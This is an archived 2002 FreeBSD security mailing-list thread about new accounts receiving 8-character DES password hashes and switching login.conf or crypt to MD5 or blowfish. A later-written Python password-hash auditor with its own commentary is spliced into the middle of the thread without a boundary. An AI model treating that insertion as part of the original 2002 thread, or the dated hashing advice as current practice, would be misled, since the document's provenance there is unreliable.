Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D41E637B44B for ; Wed, 25 Sep 2002 15:17:21 -0700 (PDT)
Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 7B41D43E4A for ; Wed, 25 Sep 2002 15:17:20 -0700 (PDT) (envelope-from mailman@mail.crypton.pl)
Received: (qmail 63335 invoked by uid 1017); 25 Sep 2002 22:17:19 -0000
Date: Thu, 26 Sep 2002 00:17:19 +0200
From: Nomad
To: freebsd-security@freebsd.org
Subject: Password encoding
Message-ID: <20020925221718.GA63296@killer.crypton.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
User-Agent: Mutt/1.4i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hello

I've upgraded my FreeBSD to 4.6.2 some time ago.  Since that day I added
some new accounts to my system.  Everything was OK but... But one beautiful
day I made a mistake and I entered a shorter password than the good one.
And what happened?  The system let me in after successful authorization!!!

So I made a small investigation.  And what I found: the new auth_default
value in my system is DES!!!  And my passwords on new accounts are only 8
characters long!!!

If you've done the same, check your master.passwd if there are some DES
encoded passwords.  Because 8 character passwords without the right password
policy (with short passwords in mind) are VERY easy to break.  I know, I
don't have to say that on this list, but writing about fundamental things is
never off-topic.

So, if I am alone with this problem: I am sorry, I must have made some
mistake.  But if not: then I think that we have to do something about this...

I upgraded my FreeBSD by buildworld/installworld from sources.

Regards
Nomad

--
[%% If you dance with devil   %%]
[%% you don't changing him.   %%]
[%% The devil is the one      %%]
[%% who is changing you.
%%]

From owner-freebsd-security  Wed Sep 25 15:26:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A44D137B401 for ; Wed, 25 Sep 2002 15:26:51 -0700 (PDT)
Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5191243E7B for ; Wed, 25 Sep 2002 15:26:51 -0700 (PDT) (envelope-from emechler@radix.cryptio.net)
Received: from radix.cryptio.net (localhost [127.0.0.1]) by radix.cryptio.net (8.12.5/8.12.5) with ESMTP id g8PMQjLG063417 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 25 Sep 2002 15:26:46 -0700 (PDT) (envelope-from emechler@radix.cryptio.net)
Received: (from emechler@localhost) by radix.cryptio.net (8.12.5/8.12.5/Submit) id g8PMQjFM063416; Wed, 25 Sep 2002 15:26:45 -0700 (PDT)
Date: Wed, 25 Sep 2002 15:26:45 -0700
From: Erick Mechler
To: Nomad
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password encoding
Message-ID: <20020925222645.GJ45330@techometer.net>
References: <20020925221718.GA63296@killer.crypton.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020925221718.GA63296@killer.crypton.pl>
User-Agent: Mutt/1.4i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

:: So I made small investigation. And what I found: new auth_default value
:: in my system is DES !!! And my password on new accounts are only 8
:: characters long !!!

You're going to want to do 2 things.  First, make sure that you have
passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb
/etc/login.conf after you do so).
Currently there's a bug with /usr/sbin/adduser which results in changed
passwords defaulting to DES, despite whatever the system default password
scheme is.  /usr/sbin/pw and /usr/bin/passwd do not suffer from this
problem.

Bottom line: don't use adduser to set your passwords upon account creation;
use the passwd utility or pw.  This will ensure that all your system
passwords are created and stay MD5.

Cheers - Erick

From owner-freebsd-security  Wed Sep 25 15:34:12 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67A6F37B401 for ; Wed, 25 Sep 2002 15:34:10 -0700 (PDT)
Received: from obsecurity.dyndns.org (adsl-64-165-226-88.dsl.lsan03.pacbell.net [64.165.226.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id B232243E77 for ; Wed, 25 Sep 2002 15:34:09 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0A4BA66B28; Wed, 25 Sep 2002 15:34:08 -0700 (PDT)
Date: Wed, 25 Sep 2002 15:34:08 -0700
From: Kris Kennaway
To: Nomad
Cc: freebsd-security@freebsd.org
Subject: Re: Password encoding
Message-ID: <20020925223408.GA15793@xor.obsecurity.org>
References: <20020925221718.GA63296@killer.crypton.pl>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="G4iJoqBmSsgzjUCe"
Content-Disposition: inline
In-Reply-To: <20020925221718.GA63296@killer.crypton.pl>
User-Agent: Mutt/1.4i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

--G4iJoqBmSsgzjUCe
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Thu, Sep 26, 2002 at 12:17:19AM +0200, Nomad wrote:
>
> Hello
>
> I've upgraded my FreeBSD to 4.6.2 some time ago.  Since that day I added
> some new accounts to my system.  Everything was OK but... But one beautiful
> day I made a mistake and I entered a shorter password than the good one.
> And what happened?  The system let me in after successful authorization!!!
> So I made a small investigation.  And what I found: the new auth_default
> value in my system is DES!!!  And my passwords on new accounts are only 8
> characters long!!!
> If you've done the same, check your master.passwd if there are some DES
> encoded passwords.  Because 8 character passwords without the right
> password policy (with short passwords in mind) are VERY easy to break.
> I know, I don't have to say that on this list, but writing about
> fundamental things is never off-topic.

This is a documented limitation in DES password hashing.  You should only
use it if you need to maintain backwards compatibility of your password
file with a legacy application/system.

Kris

--G4iJoqBmSsgzjUCe
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9kjnfWry0BWjoQKURAshcAKCILpzDGF9gkUJU++HQlG9Nwxy38QCePx/b
34/90GWzCDjSq28ZDEwpQ4M=
=VFDS
-----END PGP SIGNATURE-----

--G4iJoqBmSsgzjUCe--

From owner-freebsd-security  Thu Sep 26 01:05:09 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A854937B401 for ; Thu, 26 Sep 2002 01:05:07 -0700 (PDT)
Received: from unix.za.net (unix.za.net [137.158.96.78]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5F16E43E6E for ; Thu, 26 Sep 2002 01:05:04 -0700 (PDT) (envelope-from ukj@unix.za.net)
X-Message-Flag: Your copy of Outlook will expire in 3 days. Please contact Microsoft about purchasing a new license. Remember: software piracy is a felony!"
Received: from unix.za.net (ukj@localhost [IPv6:::1]) by unix.za.net (8.12.6/8.12.3) with ESMTP id g8Q84iNv050380; Thu, 26 Sep 2002 10:04:44 +0200 (SAST) (envelope-from ukj@unix.za.net)
Received: (from ukj@localhost) by unix.za.net (8.12.3/8.12.6/Submit) id g8Q84cua050379; Thu, 26 Sep 2002 10:04:38 +0200 (SAST)
Date: Thu, 26 Sep 2002 10:04:37 +0200
From: Todor Genov
To: Erick Mechler
Cc: freebsd-security@freebsd.org
Subject: Re: Password encoding
Message-ID: <20020926100437.A47704@unix.za.net>
References: <20020925221718.GA63296@killer.crypton.pl> <20020925222645.GJ45330@techometer.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020925222645.GJ45330@techometer.net>; from emechler@techometer.net on Wed, Sep 25, 2002 at 03:26:45PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> You're going to want to do 2 things.  First, make sure that you have your
> passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb
> /etc/login.conf after you do so).

FreeBSD has had support for blowfish passwords for quite some time now.  Just
specify passwd_format=blf in login.conf.
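The checks this thread keeps coming back to (finding DES-hashed entries in master.passwd, the 8-character limit of DES crypt that let Nomad log in with a truncated password, and the passwd_format capability in login.conf that Erick and Todor point at) can be scripted. The Python below is an added example written for this page, not code from the thread or from FreeBSD. Every function name in it is mine, the master.passwd and login.conf fragments it parses are constructed samples with placeholder hashes of the right shape, and it classifies hashes by their string form (13-character DES string, `$1$` MD5, `$2a$` blowfish) rather than by calling crypt(3), so treat the classification as a heuristic.

```python
import re

# Hash-string shapes as crypt(3) writes them into master.passwd:
#   DES      13 chars from [./0-9A-Za-z], e.g. "ab3FGh9jK.Lm1"
#   MD5      $1$<salt, up to 8 chars>$<22 chars>
#   Blowfish $2a$<2-digit cost>$<22-char salt + 31-char hash>
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
MD5_RE = re.compile(r"^\$1\$[./0-9A-Za-z]{0,8}\$[./0-9A-Za-z]{22}$")
BLF_RE = re.compile(r"^\$2[ab]?\$\d{2}\$[./0-9A-Za-z]{53}$")

# Constructed sample, not a real password file: the hashes are placeholders
# of the right shape, not real digests.
SAMPLE_MASTER_PASSWD = """\
root:$1$abcdefgh$0123456789ABCDEFGHIJKL:0:0::0:0:Charlie &:/root:/bin/csh
alice:ab3FGh9jK.Lm1:1001:1001::0:0:Alice:/home/alice:/bin/sh
bob:$2a$04$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234:1002:1002::0:0:Bob:/home/bob:/bin/sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
carol:$1$ijklmnop$ABCDEFGHIJKLMNOPQRSTUV:1003:1003::0:0:Carol:/home/carol:/bin/sh
"""

# Constructed login.conf fragments: one without passwd_format (so crypt(3)'s
# built-in default applies, DES where available) and one pinned to MD5.
SAMPLE_LOGIN_CONF_UNSET = """\
default:\\
\t:copyright=/etc/COPYRIGHT:\\
\t:welcome=/etc/motd:
"""
SAMPLE_LOGIN_CONF_MD5 = """\
default:\\
\t:passwd_format=md5:\\
\t:copyright=/etc/COPYRIGHT:\\
\t:welcome=/etc/motd:
"""


def hash_format(field):
    """Classify one master.passwd password field by the shape of the hash."""
    if field == "":
        return "empty"          # passwordless login
    if field[0] in "*!":
        return "locked"         # no hash can ever match
    if MD5_RE.match(field):
        return "md5"
    if BLF_RE.match(field):
        return "blf"
    if DES_RE.match(field):
        return "des"
    return "unknown"


def audit_master_passwd(text):
    """Return [(user, format)] for every entry in master.passwd-style text."""
    result = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        result.append((fields[0], hash_format(fields[1])))
    return result


def des_accounts(text):
    """Users whose password is DES-hashed and therefore limited to 8 chars."""
    return [user for user, fmt in audit_master_passwd(text) if fmt == "des"]


def effective_password(fmt, password):
    """Traditional DES crypt hashes only the first 8 characters of the
    password; MD5 and blowfish crypt use the whole string."""
    return password[:8] if fmt == "des" else password


def indistinguishable(fmt, typed, real):
    """True if the hash scheme cannot tell the two passwords apart; this is
    what lets a truncated password log in against a DES hash."""
    return effective_password(fmt, typed) == effective_password(fmt, real)


def login_conf_passwd_format(text, login_class="default"):
    """Return the passwd_format capability of a login.conf class, or None
    when the class does not set it (the crypt(3) default then applies)."""
    records, buf = [], ""
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1].strip()   # continuation line
            continue
        buf += line.strip()
        if buf:
            records.append(buf)
        buf = ""
    if buf:
        records.append(buf)
    for rec in records:
        parts = rec.split(":")
        if login_class in parts[0].split("|"):
            for cap in parts[1:]:
                if cap.startswith("passwd_format="):
                    return cap.split("=", 1)[1]
            return None
    return None


if __name__ == "__main__":
    for user, fmt in audit_master_passwd(SAMPLE_MASTER_PASSWD):
        print(f"{user:8s} {fmt}")
    print("DES accounts:", des_accounts(SAMPLE_MASTER_PASSWD))
    print("passwd_format:", login_conf_passwd_format(SAMPLE_LOGIN_CONF_UNSET),
          login_conf_passwd_format(SAMPLE_LOGIN_CONF_MD5))
```

Two caveats follow from the thread itself: a login.conf change only takes effect after cap_mkdb /etc/login.conf, and it only affects hashes written from then on, so any account the audit reports as DES keeps its 8-character hash until its password is set again with passwd or pw (and not with the adduser build Erick describes).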
From owner-freebsd-security  Thu Sep 26 02:22:43 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5AA6537B401 for ; Thu, 26 Sep 2002 02:22:41 -0700 (PDT)
Received: from sequel.rsm.ru (sequel.rsm.ru [217.23.86.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2C5B643E65 for ; Thu, 26 Sep 2002 02:22:38 -0700 (PDT) (envelope-from aga@sequel.rsm.ru)
Received: (from aga@localhost) by sequel.rsm.ru (8.11.1/8.11.1/RSM-3.1-s-av) id g8Q9MYR23427 for freebsd-security@freebsd.org; Thu, 26 Sep 2002 13:22:34 +0400 (MSD)
Message-Id: <200209260922.g8Q9MYR23427@sequel.rsm.ru>
Subject: Re: Password encoding
To: freebsd-security@freebsd.org
Date: Thu, 26 Sep 2002 13:22:34 +0400 (MSD)
From: Dmitry Agafonov
Reply-To: aga@rsm.ru
Organization: Radioservice Mobile Ltd, Saratov
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Todor Genov wrote:
> > You're going to want to do 2 things.  First, make sure that you have your
> > passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb
> > /etc/login.conf after you do so).
>
> FreeBSD has had support for blowfish passwords for quite some time now.  Just
> specify passwd_format=blf in login.conf.
>

Ok, how about a more common question.  How do I ask the system crypt() to
use MD5 by default?  /etc/make.conf or such?
--
Dmitry

From owner-freebsd-security  Thu Sep 26 02:55:56 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ACF8B37B401 for ; Thu, 26 Sep 2002 02:55:54 -0700 (PDT)
Received: from amun.isnic.is (amun.isnic.is [193.4.58.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id F06CC43E91 for ; Thu, 26 Sep 2002 02:55:53 -0700 (PDT) (envelope-from oli@amun.isnic.is)
Received: from amun.isnic.is (oli@localhost [127.0.0.1]) by amun.isnic.is (8.12.3/8.12.3/isnic) with ESMTP id g8Q9toIa032828; Thu, 26 Sep 2002 09:55:50 GMT (envelope-from oli@amun.isnic.is)
Received: (from oli@localhost) by amun.isnic.is (8.12.3/8.12.3/Submit) id g8Q9tosD032827; Thu, 26 Sep 2002 09:55:50 GMT (envelope-from oli)
Date: Thu, 26 Sep 2002 09:55:50 +0000
From: Olafur Osvaldsson
To: Dmitry Agafonov
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password encoding
Message-ID: <20020926095550.GB10763@isnic.is>
Mail-Followup-To: Dmitry Agafonov , freebsd-security@FreeBSD.ORG
References: <200209260922.g8Q9MYR23427@sequel.rsm.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru>
User-Agent: Mutt/1.3.28i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Dmitry,
You should be able to set it in /etc/auth.conf, but that doesn't work for me.

You can instead run crypt_set_format("md5") to set the default for your prog
to md5, or blf for blowfish.

You could also make sure that your salts start with $$ which would then
set the algorithm used in encryption; more info on this in the crypt(3) manpage.

/Oli

On Thu, 26 Sep 2002, Dmitry Agafonov wrote:

> Ok, how about more common question.
> How do I ask system crypt() to use MD5
> by default? /etc/make.conf or such?
>
> --
> Dmitry

--
Olafur Osvaldsson
Systems Administrator
Internet a Islandi hf.
Tel: +354 525-5291
Email: oli@isnic.is

From owner-freebsd-security  Thu Sep 26 03:28:49 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8643B37B401; Thu, 26 Sep 2002 03:28:46 -0700 (PDT)
Received: from mel-rto2.wanadoo.fr (smtp-out-2.wanadoo.fr [193.252.19.254]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DDC643E6A; Thu, 26 Sep 2002 03:28:45 -0700 (PDT) (envelope-from le-hen_j@epita.fr)
Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto2.wanadoo.fr (6.5.007) id 3D89D999003EC090; Thu, 26 Sep 2002 12:28:32 +0200
Received: from darthvader (217.128.38.109) by mel-rta8.wanadoo.fr (6.5.007) id 3D8011E3007FFC1E; Thu, 26 Sep 2002 12:28:31 +0200
Message-ID: <056a01c26547$72e0be50$0200a8c0@darthvader>
From: "jeremie le-hen"
To: "billy" , "Juraj Petrik"
Cc: ,
References: <20020925134615.V75126-100000@mouse.isilon.com>
Subject: Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease
Date: Thu, 26 Sep 2002 12:28:25 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> I know that ipnat will not redirect packets out the same interface they
> came, but that doesn't seem to be a problem here.
That's not true.  I've succeeded in using the same interface for incoming
and outgoing packets through ipnat, using IP aliasing.  Here is the
configuration:

# outgoing ip address
ifconfig rl0 inet 10.251.21.32 netmask 0xFFFF0000 up
# incoming one
ifconfig rl0 inet 192.168.0.1 netmask 0xFFFFFF00 alias
# ipnat rule
map rl0 192.168.0.0/24 -> 10.251.21.32/32

I don't know if it works if the outgoing IP address is on the same subnet
as the incoming one, but I think so.  It would be useful if your network
uses an authentication to be allowed to go through your default router,
and you don't have the relevant client software on some machines.  This
rule

map rl0 10.251.21.41/32 -> 10.251.21.41/32

should work in my opinion.

Regards,
--
Jeremie Le Hen aka TataZ/TtZ
le-hen_j@epita.fr

From owner-freebsd-security  Thu Sep 26 03:44:50 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DCF4037B401 for ; Thu, 26 Sep 2002 03:44:45 -0700 (PDT)
Received: from officepop3.tiscali.de (mxa.tiscali.de [194.162.162.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id BDCDE43E3B for ; Thu, 26 Sep 2002 03:44:44 -0700 (PDT) (envelope-from piontec@de.tiscali.com)
Received: from hellskitchen.nacamar.de (azze.nacamar.de [195.63.228.105]) by officepop3.tiscali.de (Postfix) with ESMTP id 3021C5D2A; Thu, 26 Sep 2002 12:44:43 +0200 (CEST)
Received: by hellskitchen.nacamar.de (Postfix, from userid 1000) id 2F9FE5A52C; Thu, 26 Sep 2002 12:44:51 +0200 (CEST)
Date: Thu, 26 Sep 2002 12:44:50 +0200
From: Jan Wagner
To: Olafur Osvaldsson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password encoding
Message-ID: <20020926124450.A18244@de.tiscali.com>
References: <200209260922.g8Q9MYR23427@sequel.rsm.ru> <20020926095550.GB10763@isnic.is>
Mime-Version: 1.0
Content-Type: text/plain;
  charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020926095550.GB10763@isnic.is>; from oli@isnic.is on Thu, Sep 26, 2002 at 09:55:50AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Part of man:

     The algorithm used will depend upon whether crypt_set_format() has been
     called and whether a global default format has been specified.  Unless a
     global default has been specified or crypt_set_format() has set the
     format to something else, the built-in default format is used.  This is
     currently DES if it is available, or MD5 if not.

     How the salt is used will depend upon the algorithm for the hash.  For
     best results, specify at least two characters of salt.

     The crypt_get_format() function returns a constant string that represents
     the name of the algorithm currently used.  Valid values are `des', `blf'
     and `md5'.

     The crypt_set_format() function sets the default encoding format
     according to the supplied string.

     The global default format can be set using the /etc/auth.conf file using
     the `crypt_format' property.

...

greets jw

ps. man: (man auth.conf) && man 3 crypt && man 3 auth_getval(!!)

On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote:
> Date: Thu, 26 Sep 2002 09:55:50 +0000
> From: Olafur Osvaldsson
> To: Dmitry Agafonov
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Password encoding
> In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru>
> User-Agent: Mutt/1.3.28i
> List-Archive: (Web Archive)
> X-Loop: FreeBSD.org
> X-OriginalArrivalTime: 26 Sep 2002 09:56:15.0528 (UTC) FILETIME=[F3F9DA80:01C26542]
>
> Dmitry,
> You should be able to set it in /etc/auth.conf, but that doesn't work for me.
>
> You can instead run crypt_set_format("md5") to set the default for your prog
> to md5 or blf for blowfish.
> > You could also make sure that your salts start with $$ wich would then > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > /Oli > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > by default? /etc/make.conf or such? > > > > -- > > Dmitry > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Olafur Osvaldsson > Systems Administrator > Internet a Islandi hf. > Tel: +354 525-5291 > Email: oli@isnic.is > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 3:54:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8EC7337B401 for ; Thu, 26 Sep 2002 03:54:09 -0700 (PDT) Received: from officepop3.tiscali.de (mxa.tiscali.de [194.162.162.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CB1C43E6A for ; Thu, 26 Sep 2002 03:54:09 -0700 (PDT) (envelope-from piontec@de.tiscali.com) Received: from hellskitchen.nacamar.de (azze.nacamar.de [195.63.228.105]) by officepop3.tiscali.de (Postfix) with ESMTP id 35E445D2A; Thu, 26 Sep 2002 12:54:07 +0200 (CEST) Received: by hellskitchen.nacamar.de (Postfix, from userid 1000) id CDDA85A52C; Thu, 26 Sep 2002 12:54:15 +0200 (CEST) Date: Thu, 26 Sep 2002 12:54:15 +0200 From: Jan Wagner To: Olafur Osvaldsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password encoding Message-ID: <20020926125415.B4034@de.tiscali.com> References: <200209260922.g8Q9MYR23427@sequel.rsm.ru> <20020926095550.GB10763@isnic.is> <20020926124450.A18244@de.tiscali.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: 
inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020926124450.A18244@de.tiscali.com>; from jan.wagner@de.tiscali.com on Thu, Sep 26, 2002 at 12:44:50PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ... arg! i forgott, maybe you should also take a look at http://quasar.mathstat.uottawa.ca/~selinger/ccrypt/ "ccrypt is a utility for encrypting and decrypting files and streams." "It was designed as a replacement for the standard unix crypt utility..." greets jw On Thu, Sep 26, 2002 at 12:44:50PM +0200, Jan Wagner wrote: > Date: Thu, 26 Sep 2002 12:44:50 +0200 > From: Jan Wagner > To: Olafur Osvaldsson > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Password encoding > User-Agent: Mutt/1.2.5.1i > In-Reply-To: <20020926095550.GB10763@isnic.is>; from oli@isnic.is on Thu, Sep 26, 2002 at 09:55:50AM +0000 > List-Archive: (Web Archive) > X-Loop: FreeBSD.org > X-OriginalArrivalTime: 26 Sep 2002 10:45:16.0902 (UTC) FILETIME=[CD2BE860:01C26549] > > Part of man : > > > The algorithm used will depend upon whether crypt_set_format() has been > called and whether a global default format has been specified. Unless a > global default has been specified or crypt_set_format() has set the for- > mat to something else, the built-in default format is used. This is cur- > rently DES if it is available, or MD5 if not. > > How the salt is used will depend upon the algorithm for the hash. For > best results, specify at least two characters of salt. > > The crypt_get_format() function returns a constant string that represents > the name of the algorithm currently used. Valid values are `des', `blf' > and `md5'. > > The crypt_set_format() function sets the default encoding format accord- > ing to the supplied string. > > The global default format can be set using the /etc/auth.conf file using > the `crypt_format' property. > > ... > > greets jw > > ps. 
man : (man auth.conf) && man 3 crypt && man 3 auth_getval(!!) > > On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote: > > Date: Thu, 26 Sep 2002 09:55:50 +0000 > > From: Olafur Osvaldsson > > To: Dmitry Agafonov > > Cc: freebsd-security@FreeBSD.ORG > > Subject: Re: Password encoding > > In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru> > > User-Agent: Mutt/1.3.28i > > List-Archive: (Web Archive) > > X-Loop: FreeBSD.org > > X-OriginalArrivalTime: 26 Sep 2002 09:56:15.0528 (UTC) FILETIME=[F3F9DA80:01C26542] > > > > Dmitry, > > You should be able to set it in /etc/auth.conf, but that doesn't work for me. > > > > You can instead run crypt_set_format("md5") to set the default for your prog > > to md5 or blf for blowfish. > > > > You could also make sure that your salts start with $$ wich would then > > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > > > /Oli > > > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > > by default? /etc/make.conf or such? > > > > > > -- > > > Dmitry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > > Olafur Osvaldsson > > Systems Administrator > > Internet a Islandi hf. 
> > Tel: +354 525-5291 > > Email: oli@isnic.is > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 10:32: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C835E37B401 for ; Thu, 26 Sep 2002 10:31:59 -0700 (PDT) Received: from gaia.nimnet.asn.au (nimbin.lnk.telstra.net [139.130.45.143]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8933D43E4A for ; Thu, 26 Sep 2002 10:31:57 -0700 (PDT) (envelope-from smithi@nimnet.asn.au) Received: from localhost (smithi@localhost) by gaia.nimnet.asn.au (8.8.8/8.8.8R1.2) with SMTP id DAA13415; Fri, 27 Sep 2002 03:31:09 +1000 (EST) (envelope-from smithi@nimnet.asn.au) Date: Fri, 27 Sep 2002 03:31:08 +1000 (EST) From: Ian Smith To: Jan Wagner Cc: Olafur Osvaldsson , Dmitry Agafonov , freebsd-security@FreeBSD.ORG Subject: Re: Password encoding In-Reply-To: <20020926124450.A18244@de.tiscali.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Sep 2002, Jan Wagner wrote: > Part of man : > > The algorithm used will depend upon whether crypt_set_format() has been > called and whether a global default format has been specified. Unless a > global default has been specified or crypt_set_format() has set the for- > mat to something else, the built-in default format is used. This is cur- > rently DES if it is available, or MD5 if not. 
